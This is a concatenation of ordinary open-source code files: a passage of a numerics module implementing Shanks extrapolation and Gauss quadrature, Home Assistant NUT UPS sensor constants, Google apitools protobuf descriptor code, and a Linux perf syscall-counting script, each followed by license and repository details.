- The columns with even index hold dummy entries (required for the
computation) and the columns with odd index hold the actual
extrapolates.
- The last element in the last row is typically the most
accurate estimate of the limit.
- The difference to the third last element in the last row
provides an estimate of the approximation error.
- The magnitude of the second last element provides an estimate
of the numerical accuracy lost to cancellation.
For convenience, so the extrapolation is stopped at an odd index
so that ``shanks(seq)[-1][-1]`` always gives an estimate of the
limit.
Optionally, an existing table can be passed to :func:`~mpmath.shanks`.
This can be used to efficiently extend a previous computation after
new elements have been appended to the sequence. The table will
then be updated in-place.
The Shanks transformation:
The Shanks transformation is defined as follows (see [2]): given
the input sequence `(A_0, A_1, \ldots)`, the transformed sequence is
given by
.. math ::
S(A_k) = \frac{A_{k+1}A_{k-1}-A_k^2}{A_{k+1}+A_{k-1}-2 A_k}
The Shanks transformation gives the exact limit `A_{\infty}` in a
single step if `A_k = A + a q^k`. Note in particular that it
extrapolates the exact sum of a geometric series in a single step.
Applying the Shanks transformation once often improves convergence
substantially for an arbitrary sequence, but the optimal effect is
obtained by applying it iteratively:
`S(S(A_k)), S(S(S(A_k))), \ldots`.
Wynn's epsilon algorithm provides an efficient way to generate
the table of iterated Shanks transformations. It reduces the
computation of each element to essentially a single division, at
the cost of requiring dummy elements in the table. See [1] for
details.
Precision issues:
Due to cancellation effects, the sequence must be typically be
computed at a much higher precision than the target accuracy
of the extrapolation.
If the Shanks transformation converges to the exact limit (such
as if the sequence is a geometric series), then a division by
zero occurs. By default, :func:`~mpmath.shanks` handles this case by
terminating the iteration and returning the table it has
generated so far. With *randomized=True*, it will instead
replace the zero by a pseudorandom number close to zero.
(TODO: find a better solution to this problem.)
Examples (truncated from original)
We illustrate by applying Shanks transformation to the Leibniz
series for `\pi`:
>>> S = [4*sum((-1)**n/(2*n+1) for n in range(m))
... for m in range(1,30)]
>>>
>>> T = shanks_table(S[:7])
>>> for row in T:
... print('['+', '.join(['{:.6g}'.format(v) for v in row])+']')
...
[-0.75]
[1.25, 3.16667]
[-1.75, 3.13333, -28.75]
[2.25, 3.14524, 82.25, 3.14234]
[-2.75, 3.13968, -177.75, 3.14139, -969.938]
[3.25, 3.14271, 327.25, 3.14166, 3515.06, 3.14161]
'''
if len(seq) < 2:
raise ValueError("seq should be of minimum length 2")
if table:
START = len(table)
else:
START = 0
table = []
STOP = len(seq) - 1
if STOP & 1:
STOP -= 1
one = 1.0#ctx.one
eps = np.spacing(1)#+ctx.eps
if randomized:
from random import Random
rnd = Random()
rnd.seed(START)
for i in range(START, STOP):
row = []
for j in range(i+1):
if j == 0:
a, b = 0, seq[i+1]-seq[i]
else:
if j == 1:
a = seq[i]
else:
a = table[i-1][j-2]
b = row[j-1] - table[i-1][j-1]
if not b:
if randomized:
b = rnd.getrandbits(10)*eps
elif i & 1:
return table[:-1]
else:
return table
row.append(a + one/b)
table.append(row)
return table
def shanks(seq, ind=0):
"""Iterated Shanks transformation to accelerate series convergence
Though normally applied to a 1d array, `shanks` will actually operate on
the last dimension of seq which allows for multi-dimensional arrays. e.g.
for 2d data each row of sequence whould be a separate sequence
Parameters
----------
seq : list or array
If seq is a numpy array then it's elements will be modified in-place.
If seq is a list then seq will not be modified.
ind : int, optional
Start index for extrapolation. Can be negative, e.g. ind=-5
will extrapolate based on the last 5 elements of the `seq`.
default ind=0 i.e. use all elements.
Returns
-------
out : array with 1 dim less than `seq`, or float if seq is only 1d.
Extrapolated value. If `seq` is a numpy array then due to in-place
modification the result will also be in seq[..., -1].
See Also
--------
shanks_table : Copy of sympy.mpmath.calculus.extrapolation.shanks
Provides the whole epsilon table and error estimates.
numpy.apply_along_axis : If your sequence is not in the last dimension of
an array then use np.apply_along_axis to apply it along a specific
axis.
Notes
-----
I think this will also work on multi-dimensional data. The shanks
extrapolation will be performed on the last dimension of the data.
So for 2d data each row is a separate sequence.
For sequence:
.. math A=\\sum_{m=0}^{\\infty}a_m
The partial sum is first defined as:
.. math:: A_n=\\sum_{m=0}^{n}a_m
This forms a new sequence, the convergence of which can be sped up by
repeated use of:
.. math:: S(A_n)=\\frac{A_{n+1}A_{n-1}-A_n^2}{A_{n+1}-2A_n+A_{n-1}}
"""
seq = np.atleast_1d(seq)
if ind is None:
return +seq[..., -1]
if ind < 0:
ind = seq.shape[-1] + ind
ind = max(ind, 0)
for i in range(ind, seq.shape[-1] - 2, 2):
denom = (seq[..., i + 2:] - 2 * seq[..., i + 1: -1] + seq[..., i:-2])
if np.any(denom==0):
return +seq[..., -1]
seq[..., i + 2:] = (
(seq[..., i + 2:] * seq[..., i:-2] - seq[..., i + 1:-1]**2) /
denom)
return +seq[...,-1]
def gk_quad(f, a, b, args=(), n=10, sum_intervals=False):
"""Integration by Gauss-Kronrod quadrature between intervals
Parameters
----------
f : function or method
Function to integrate.
a, b : 1d array
Limits of integration. Must have len(a)==len(b).
args : tuple, optional
`args` will be passed to f using f(x, *args). Default args=().
n : [7,10,15,20,25,30], optional
Number of gauss quadrature evaluation points. Default n=10. There will
be 2*n+1 Kronrod quadrature points.
sum_intervals : [False, True]
If sum_intervals=True the integral for each a and b, will be summed.
Otherwise each interval integration will be returned. The sum of the
error estimates will also be summed.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
err_estimate : ndarray same size as igal
Estimate of the error in the integral. i.e. absolute value of fine
integral minus coarse integral.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj1, wj2 = gauss_kronrod_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj1 = wj1[np.newaxis, :]
wj2 = wj2[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
bpa = (ai + bi) /2 # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
#get shape of output with scalar argument and form a slice that will ensure
#any extra dims are appended to the args.
extra = np.array(f(xij.flat[0], *args))
gen_slice = [slice(None)] * xij.ndim + [None] * extra.ndim
fij = f(xij[gen_slice], *args)
# igral1 = np.ravel(bma) * np.sum(fij * wj1, axis=1)
# igral2 = np.ravel(bma) * np.sum(fij * wj2, axis=1)
# igral1 = bma[:, 0] * np.sum(fij * wj1, axis=1)
# igral2 = bma[:, 0] * np.sum(fij * wj2, axis=1)
igral1 = np.sum(bma[gen_slice] *fij * wj1[gen_slice], axis=1)
igral2 = np.sum(bma[gen_slice] *fij * wj2[gen_slice], axis=1)
err_estimate = np.abs(igral2 - igral1)
if sum_intervals:
igral1 = np.sum(igral1, axis=0)
igral2 = np.sum(igral2, axis=0)
err_estimate = np.sum(err_estimate, axis=0)
return igral2, err_estimate
def gl_quad(f, a, b, args=(), n=10, shanks_ind=False, sum_intervals=False):
"""Integration by Gauss-Legendre quadrature with subdivided interval
Parameters
----------
f : function or method
function to integrate. Must accept vector aguments for x. Might
need to use numpy.vecotrize.
a, b : 1d array
limits of integration
args : tuple, optional
args will be passed to f using f(x, *args). default=()
n : [2-20, 32, 64, 100], optional
number of quadrature evaluation points. default=10
sum_intervals : [False, True]
If sum_intervals=True the integral for each a and b, will be summed.
Otherwise each interval integration will be returned.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
Notes
-----
Be careful when using large values of n.There may be precision issues.
If f returns an ndarray when x is scalar. igral will have additonal
dimensions corresponding to those of the f-with-scalar-x output.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj = gauss_legendre_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj = wj[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
bpa = (ai + bi) /2 # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
#get shape of output with scalar argument and form a slice that will ensure
#any extra dims are appended to the args.
extra = np.array(f(xij.flat[0], *args))
gen_slice = [slice(None)] * xij.ndim + [None] * extra.ndim
fij = f(xij[gen_slice], *args)
igral = np.sum(bma[gen_slice] * fij *wj[gen_slice], axis=1)
if sum_intervals:
igral = np.sum(igral, axis=0)
return igral
| gpl-3.0 |
soldag/home-assistant | homeassistant/components/nut/const.py | 10 | 7810 | """The nut component."""
from homeassistant.components.sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_POWER,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.const import (
ELECTRICAL_CURRENT_AMPERE,
ELECTRICAL_VOLT_AMPERE,
FREQUENCY_HERTZ,
PERCENTAGE,
POWER_WATT,
TEMP_CELSIUS,
TIME_SECONDS,
VOLT,
)
DOMAIN = "nut"
PLATFORMS = ["sensor"]
UNDO_UPDATE_LISTENER = "undo_update_listener"
DEFAULT_NAME = "NUT UPS"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 3493
KEY_STATUS = "ups.status"
KEY_STATUS_DISPLAY = "ups.status.display"
COORDINATOR = "coordinator"
DEFAULT_SCAN_INTERVAL = 60
PYNUT_DATA = "data"
PYNUT_UNIQUE_ID = "unique_id"
PYNUT_MANUFACTURER = "manufacturer"
PYNUT_MODEL = "model"
PYNUT_FIRMWARE = "firmware"
PYNUT_NAME = "name"
SENSOR_TYPES = {
"ups.status.display": ["Status", "", "mdi:information-outline", None],
"ups.status": ["Status Data", "", "mdi:information-outline", None],
"ups.alarm": ["Alarms", "", "mdi:alarm", None],
"ups.temperature": [
"UPS Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"ups.load": ["Load", PERCENTAGE, "mdi:gauge", None],
"ups.load.high": ["Overload Setting", PERCENTAGE, "mdi:gauge", None],
"ups.id": ["System identifier", "", "mdi:information-outline", None],
"ups.delay.start": ["Load Restart Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.reboot": ["UPS Reboot Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.shutdown": [
"UPS Shutdown Delay",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.timer.start": ["Load Start Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.reboot": ["Load Reboot Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.shutdown": [
"Load Shutdown Timer",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.interval": [
"Self-Test Interval",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.result": ["Self-Test Result", "", "mdi:information-outline", None],
"ups.test.date": ["Self-Test Date", "", "mdi:calendar", None],
"ups.display.language": ["Language", "", "mdi:information-outline", None],
"ups.contacts": ["External Contacts", "", "mdi:information-outline", None],
"ups.efficiency": ["Efficiency", PERCENTAGE, "mdi:gauge", None],
"ups.power": ["Current Apparent Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.power.nominal": ["Nominal Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.realpower": [
"Current Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.realpower.nominal": [
"Nominal Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.beeper.status": ["Beeper Status", "", "mdi:information-outline", None],
"ups.type": ["UPS Type", "", "mdi:information-outline", None],
"ups.watchdog.status": ["Watchdog Status", "", "mdi:information-outline", None],
"ups.start.auto": ["Start on AC", "", "mdi:information-outline", None],
"ups.start.battery": ["Start on Battery", "", "mdi:information-outline", None],
"ups.start.reboot": ["Reboot on Battery", "", "mdi:information-outline", None],
"ups.shutdown": ["Shutdown Ability", "", "mdi:information-outline", None],
"battery.charge": [
"Battery Charge",
PERCENTAGE,
"mdi:gauge",
DEVICE_CLASS_BATTERY,
],
"battery.charge.low": ["Low Battery Setpoint", PERCENTAGE, "mdi:gauge", None],
"battery.charge.restart": [
"Minimum Battery to Start",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charge.warning": [
"Warning Battery Setpoint",
PERCENTAGE,
"mdi:gauge",
None,
],
"battery.charger.status": ["Charging Status", "", "mdi:information-outline", None],
"battery.voltage": ["Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.nominal": ["Nominal Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.low": ["Low Battery Voltage", VOLT, "mdi:flash", None],
"battery.voltage.high": ["High Battery Voltage", VOLT, "mdi:flash", None],
"battery.capacity": ["Battery Capacity", "Ah", "mdi:flash", None],
"battery.current": [
"Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.current.total": [
"Total Battery Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"battery.temperature": [
"Battery Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"battery.runtime": ["Battery Runtime", TIME_SECONDS, "mdi:timer-outline", None],
"battery.runtime.low": [
"Low Battery Runtime",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.runtime.restart": [
"Minimum Battery Runtime to Start",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"battery.alarm.threshold": [
"Battery Alarm Threshold",
"",
"mdi:information-outline",
None,
],
"battery.date": ["Battery Date", "", "mdi:calendar", None],
"battery.mfr.date": ["Battery Manuf. Date", "", "mdi:calendar", None],
"battery.packs": ["Number of Batteries", "", "mdi:information-outline", None],
"battery.packs.bad": [
"Number of Bad Batteries",
"",
"mdi:information-outline",
None,
],
"battery.type": ["Battery Chemistry", "", "mdi:information-outline", None],
"input.sensitivity": [
"Input Power Sensitivity",
"",
"mdi:information-outline",
None,
],
"input.transfer.low": ["Low Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.high": ["High Voltage Transfer", VOLT, "mdi:flash", None],
"input.transfer.reason": [
"Voltage Transfer Reason",
"",
"mdi:information-outline",
None,
],
"input.voltage": ["Input Voltage", VOLT, "mdi:flash", None],
"input.voltage.nominal": ["Nominal Input Voltage", VOLT, "mdi:flash", None],
"input.frequency": ["Input Line Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"input.frequency.nominal": [
"Nominal Input Line Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
"input.frequency.status": [
"Input Frequency Status",
"",
"mdi:information-outline",
None,
],
"output.current": ["Output Current", ELECTRICAL_CURRENT_AMPERE, "mdi:flash", None],
"output.current.nominal": [
"Nominal Output Current",
ELECTRICAL_CURRENT_AMPERE,
"mdi:flash",
None,
],
"output.voltage": ["Output Voltage", VOLT, "mdi:flash", None],
"output.voltage.nominal": ["Nominal Output Voltage", VOLT, "mdi:flash", None],
"output.frequency": ["Output Frequency", FREQUENCY_HERTZ, "mdi:flash", None],
"output.frequency.nominal": [
"Nominal Output Frequency",
FREQUENCY_HERTZ,
"mdi:flash",
None,
],
}
STATE_TYPES = {
"OL": "Online",
"OB": "On Battery",
"LB": "Low Battery",
"HB": "High Battery",
"RB": "Battery Needs Replaced",
"CHRG": "Battery Charging",
"DISCHRG": "Battery Discharging",
"BYPASS": "Bypass Active",
"CAL": "Runtime Calibration",
"OFF": "Offline",
"OVER": "Overloaded",
"TRIM": "Trimming Voltage",
"BOOST": "Boosting Voltage",
"FSD": "Forced Shutdown",
"ALARM": "Alarm",
}
SENSOR_NAME = 0
SENSOR_UNIT = 1
SENSOR_ICON = 2
SENSOR_DEVICE_CLASS = 3
| apache-2.0 |
Sorsly/subtle | google-cloud-sdk/lib/third_party/apitools/base/protorpclite/descriptor.py | 6 | 19700 | #!/usr/bin/env python
#
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Services descriptor definitions.
Contains message definitions and functions for converting
service classes into transmittable message format.
Describing an Enum instance, Enum class, Field class or Message class will
generate an appropriate descriptor object that describes that class.
This message can itself be used to transmit information to clients wishing
to know the description of an enum value, enum, field or message without
needing to download the source code. This format is also compatible with
other, non-Python languages.
The descriptors are modeled to be binary compatible with
https://github.com/google/protobuf
NOTE: The names of types and fields are not always the same between these
descriptors and the ones defined in descriptor.proto. This was done in order
to make source code files that use these descriptors easier to read. For
example, it is not necessary to prefix TYPE to all the values in
FieldDescriptor.Variant as is done in descriptor.proto
FieldDescriptorProto.Type.
Example:
class Pixel(messages.Message):
x = messages.IntegerField(1, required=True)
y = messages.IntegerField(2, required=True)
color = messages.BytesField(3)
# Describe Pixel class using message descriptor.
fields = []
field = FieldDescriptor()
field.name = 'x'
field.number = 1
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'y'
field.number = 2
field.label = FieldDescriptor.Label.REQUIRED
field.variant = FieldDescriptor.Variant.INT64
fields.append(field)
field = FieldDescriptor()
field.name = 'color'
field.number = 3
field.label = FieldDescriptor.Label.OPTIONAL
field.variant = FieldDescriptor.Variant.BYTES
fields.append(field)
message = MessageDescriptor()
message.name = 'Pixel'
message.fields = fields
# Describing is the equivalent of building the above message.
message == describe_message(Pixel)
Public Classes:
EnumValueDescriptor: Describes Enum values.
EnumDescriptor: Describes Enum classes.
FieldDescriptor: Describes field instances.
FileDescriptor: Describes a single 'file' unit.
FileSet: Describes a collection of file descriptors.
MessageDescriptor: Describes Message classes.
Public Functions:
describe_enum_value: Describe an individual enum-value.
describe_enum: Describe an Enum class.
describe_field: Describe a Field definition.
describe_file: Describe a 'file' unit from a Python module or object.
describe_file_set: Describe a file set from a list of modules or objects.
describe_message: Describe a Message definition.
"""
import codecs
import types
import six
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import util
__all__ = [
'EnumDescriptor',
'EnumValueDescriptor',
'FieldDescriptor',
'MessageDescriptor',
'FileDescriptor',
'FileSet',
'DescriptorLibrary',
'describe_enum',
'describe_enum_value',
'describe_field',
'describe_message',
'describe_file',
'describe_file_set',
'describe',
'import_descriptor_loader',
]
# NOTE: MessageField is missing because message fields cannot have
# a default value at this time.
# TODO(user): Support default message values.
#
# Map to functions that convert default values of fields of a given type
# to a string. The function must return a value that is compatible with
# FieldDescriptor.default_value and therefore a unicode string.
_DEFAULT_TO_STRING_MAP = {
messages.IntegerField: six.text_type,
messages.FloatField: six.text_type,
messages.BooleanField: lambda value: value and u'true' or u'false',
messages.BytesField: lambda value: codecs.escape_encode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: lambda value: six.text_type(value.number),
}
_DEFAULT_FROM_STRING_MAP = {
messages.IntegerField: int,
messages.FloatField: float,
messages.BooleanField: lambda value: value == u'true',
messages.BytesField: lambda value: codecs.escape_decode(value)[0],
messages.StringField: lambda value: value,
messages.EnumField: int,
}
class EnumValueDescriptor(messages.Message):
"""Enum value descriptor.
Fields:
name: Name of enumeration value.
number: Number of enumeration value.
"""
# TODO(user): Why are these listed as optional in descriptor.proto.
# Harmonize?
name = messages.StringField(1, required=True)
number = messages.IntegerField(2,
required=True,
variant=messages.Variant.INT32)
class EnumDescriptor(messages.Message):
"""Enum class descriptor.
Fields:
name: Name of Enum without any qualification.
values: Values defined by Enum class.
"""
name = messages.StringField(1)
values = messages.MessageField(EnumValueDescriptor, 2, repeated=True)
class FieldDescriptor(messages.Message):
"""Field definition descriptor.
Enums:
Variant: Wire format hint sub-types for field.
Label: Values for optional, required and repeated fields.
Fields:
name: Name of field.
number: Number of field.
variant: Variant of field.
type_name: Type name for message and enum fields.
default_value: String representation of default value.
"""
Variant = messages.Variant # pylint:disable=invalid-name
class Label(messages.Enum):
"""Field label."""
OPTIONAL = 1
REQUIRED = 2
REPEATED = 3
name = messages.StringField(1, required=True)
number = messages.IntegerField(3,
required=True,
variant=messages.Variant.INT32)
label = messages.EnumField(Label, 4, default=Label.OPTIONAL)
variant = messages.EnumField(Variant, 5)
type_name = messages.StringField(6)
# For numeric types, contains the original text representation of
# the value.
# For booleans, "true" or "false".
# For strings, contains the default text contents (not escaped in any
# way).
# For bytes, contains the C escaped value. All bytes < 128 are that are
# traditionally considered unprintable are also escaped.
default_value = messages.StringField(7)
class MessageDescriptor(messages.Message):
"""Message definition descriptor.
Fields:
name: Name of Message without any qualification.
fields: Fields defined for message.
message_types: Nested Message classes defined on message.
enum_types: Nested Enum classes defined on message.
"""
name = messages.StringField(1)
fields = messages.MessageField(FieldDescriptor, 2, repeated=True)
message_types = messages.MessageField(
'apitools.base.protorpclite.descriptor.MessageDescriptor', 3,
repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 4, repeated=True)
class FileDescriptor(messages.Message):
"""Description of file containing protobuf definitions.
Fields:
package: Fully qualified name of package that definitions belong to.
message_types: Message definitions contained in file.
enum_types: Enum definitions contained in file.
"""
package = messages.StringField(2)
# TODO(user): Add dependency field
message_types = messages.MessageField(MessageDescriptor, 4, repeated=True)
enum_types = messages.MessageField(EnumDescriptor, 5, repeated=True)
class FileSet(messages.Message):
"""A collection of FileDescriptors.
Fields:
files: Files in file-set.
"""
files = messages.MessageField(FileDescriptor, 1, repeated=True)
def describe_enum_value(enum_value):
"""Build descriptor for Enum instance.
Args:
enum_value: Enum value to provide descriptor for.
Returns:
Initialized EnumValueDescriptor instance describing the Enum instance.
"""
enum_value_descriptor = EnumValueDescriptor()
enum_value_descriptor.name = six.text_type(enum_value.name)
enum_value_descriptor.number = enum_value.number
return enum_value_descriptor
def describe_enum(enum_definition):
"""Build descriptor for Enum class.
Args:
enum_definition: Enum class to provide descriptor for.
Returns:
Initialized EnumDescriptor instance describing the Enum class.
"""
enum_descriptor = EnumDescriptor()
enum_descriptor.name = enum_definition.definition_name().split('.')[-1]
values = []
for number in enum_definition.numbers():
value = enum_definition.lookup_by_number(number)
values.append(describe_enum_value(value))
if values:
enum_descriptor.values = values
return enum_descriptor
def describe_field(field_definition):
"""Build descriptor for Field instance.
Args:
field_definition: Field instance to provide descriptor for.
Returns:
Initialized FieldDescriptor instance describing the Field instance.
"""
field_descriptor = FieldDescriptor()
field_descriptor.name = field_definition.name
field_descriptor.number = field_definition.number
field_descriptor.variant = field_definition.variant
if isinstance(field_definition, messages.EnumField):
field_descriptor.type_name = field_definition.type.definition_name()
if isinstance(field_definition, messages.MessageField):
field_descriptor.type_name = (
field_definition.message_type.definition_name())
if field_definition.default is not None:
field_descriptor.default_value = _DEFAULT_TO_STRING_MAP[
type(field_definition)](field_definition.default)
# Set label.
if field_definition.repeated:
field_descriptor.label = FieldDescriptor.Label.REPEATED
elif field_definition.required:
field_descriptor.label = FieldDescriptor.Label.REQUIRED
else:
field_descriptor.label = FieldDescriptor.Label.OPTIONAL
return field_descriptor
def describe_message(message_definition):
"""Build descriptor for Message class.
Args:
message_definition: Message class to provide descriptor for.
Returns:
Initialized MessageDescriptor instance describing the Message class.
"""
message_descriptor = MessageDescriptor()
message_descriptor.name = message_definition.definition_name().split(
'.')[-1]
fields = sorted(message_definition.all_fields(),
key=lambda v: v.number)
if fields:
message_descriptor.fields = [describe_field(field) for field in fields]
try:
nested_messages = message_definition.__messages__
except AttributeError:
pass
else:
message_descriptors = []
for name in nested_messages:
value = getattr(message_definition, name)
message_descriptors.append(describe_message(value))
message_descriptor.message_types = message_descriptors
try:
nested_enums = message_definition.__enums__
except AttributeError:
pass
else:
enum_descriptors = []
for name in nested_enums:
value = getattr(message_definition, name)
enum_descriptors.append(describe_enum(value))
message_descriptor.enum_types = enum_descriptors
return message_descriptor
def describe_file(module):
"""Build a file from a specified Python module.
Args:
module: Python module to describe.
Returns:
Initialized FileDescriptor instance describing the module.
"""
descriptor = FileDescriptor()
descriptor.package = util.get_package_for_module(module)
if not descriptor.package:
descriptor.package = None
message_descriptors = []
enum_descriptors = []
# Need to iterate over all top level attributes of the module looking for
# message and enum definitions. Each definition must be itself described.
for name in sorted(dir(module)):
value = getattr(module, name)
if isinstance(value, type):
if issubclass(value, messages.Message):
message_descriptors.append(describe_message(value))
elif issubclass(value, messages.Enum):
enum_descriptors.append(describe_enum(value))
if message_descriptors:
descriptor.message_types = message_descriptors
if enum_descriptors:
descriptor.enum_types = enum_descriptors
return descriptor
def describe_file_set(modules):
"""Build a file set from a specified Python modules.
Args:
modules: Iterable of Python module to describe.
Returns:
Initialized FileSet instance describing the modules.
"""
descriptor = FileSet()
file_descriptors = []
for module in modules:
file_descriptors.append(describe_file(module))
if file_descriptors:
descriptor.files = file_descriptors
return descriptor
def describe(value):
"""Describe any value as a descriptor.
Helper function for describing any object with an appropriate descriptor
object.
Args:
value: Value to describe as a descriptor.
Returns:
Descriptor message class if object is describable as a descriptor, else
None.
"""
if isinstance(value, types.ModuleType):
return describe_file(value)
elif isinstance(value, messages.Field):
return describe_field(value)
elif isinstance(value, messages.Enum):
return describe_enum_value(value)
elif isinstance(value, type):
if issubclass(value, messages.Message):
return describe_message(value)
elif issubclass(value, messages.Enum):
return describe_enum(value)
return None
@util.positional(1)
def import_descriptor_loader(definition_name, importer=__import__):
"""Find objects by importing modules as needed.
A definition loader is a function that resolves a definition name to a
descriptor.
The import finder resolves definitions to their names by importing modules
when necessary.
Args:
definition_name: Name of definition to find.
importer: Import function used for importing new modules.
Returns:
Appropriate descriptor for any describable type located by name.
Raises:
DefinitionNotFoundError when a name does not refer to either a definition
or a module.
"""
# Attempt to import descriptor as a module.
if definition_name.startswith('.'):
definition_name = definition_name[1:]
if not definition_name.startswith('.'):
leaf = definition_name.split('.')[-1]
if definition_name:
try:
module = importer(definition_name, '', '', [leaf])
except ImportError:
pass
else:
return describe(module)
try:
# Attempt to use messages.find_definition to find item.
return describe(messages.find_definition(definition_name,
importer=__import__))
except messages.DefinitionNotFoundError as err:
# There are things that find_definition will not find, but if
# the parent is loaded, its children can be searched for a
# match.
split_name = definition_name.rsplit('.', 1)
if len(split_name) > 1:
parent, child = split_name
try:
parent_definition = import_descriptor_loader(
parent, importer=importer)
except messages.DefinitionNotFoundError:
# Fall through to original error.
pass
else:
# Check the parent definition for a matching descriptor.
if isinstance(parent_definition, EnumDescriptor):
search_list = parent_definition.values or []
elif isinstance(parent_definition, MessageDescriptor):
search_list = parent_definition.fields or []
else:
search_list = []
for definition in search_list:
if definition.name == child:
return definition
# Still didn't find. Reraise original exception.
raise err
class DescriptorLibrary(object):
"""A descriptor library is an object that contains known definitions.
A descriptor library contains a cache of descriptor objects mapped by
definition name. It contains all types of descriptors except for
file sets.
When a definition name is requested that the library does not know about
it can be provided with a descriptor loader which attempt to resolve the
missing descriptor.
"""
@util.positional(1)
def __init__(self,
descriptors=None,
descriptor_loader=import_descriptor_loader):
"""Constructor.
Args:
descriptors: A dictionary or dictionary-like object that can be used
to store and cache descriptors by definition name.
definition_loader: A function used for resolving missing descriptors.
The function takes a definition name as its parameter and returns
an appropriate descriptor. It may raise DefinitionNotFoundError.
"""
self.__descriptor_loader = descriptor_loader
self.__descriptors = descriptors or {}
def lookup_descriptor(self, definition_name):
"""Lookup descriptor by name.
Get descriptor from library by name. If descriptor is not found will
attempt to find via descriptor loader if provided.
Args:
definition_name: Definition name to find.
Returns:
Descriptor that describes definition name.
Raises:
DefinitionNotFoundError if not descriptor exists for definition name.
"""
try:
return self.__descriptors[definition_name]
except KeyError:
pass
if self.__descriptor_loader:
definition = self.__descriptor_loader(definition_name)
self.__descriptors[definition_name] = definition
return definition
else:
raise messages.DefinitionNotFoundError(
'Could not find definition for %s' % definition_name)
def lookup_package(self, definition_name):
"""Determines the package name for any definition.
Determine the package that any definition name belongs to. May
check parent for package name and will resolve missing
descriptors if provided descriptor loader.
Args:
definition_name: Definition name to find package for.
"""
while True:
descriptor = self.lookup_descriptor(definition_name)
if isinstance(descriptor, FileDescriptor):
return descriptor.package
else:
index = definition_name.rfind('.')
if index < 0:
return None
definition_name = definition_name[:index]
| mit |
teamacid/android_kernel_teamacid | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40d %10d\n" % (id, val),
| gpl-2.0 |
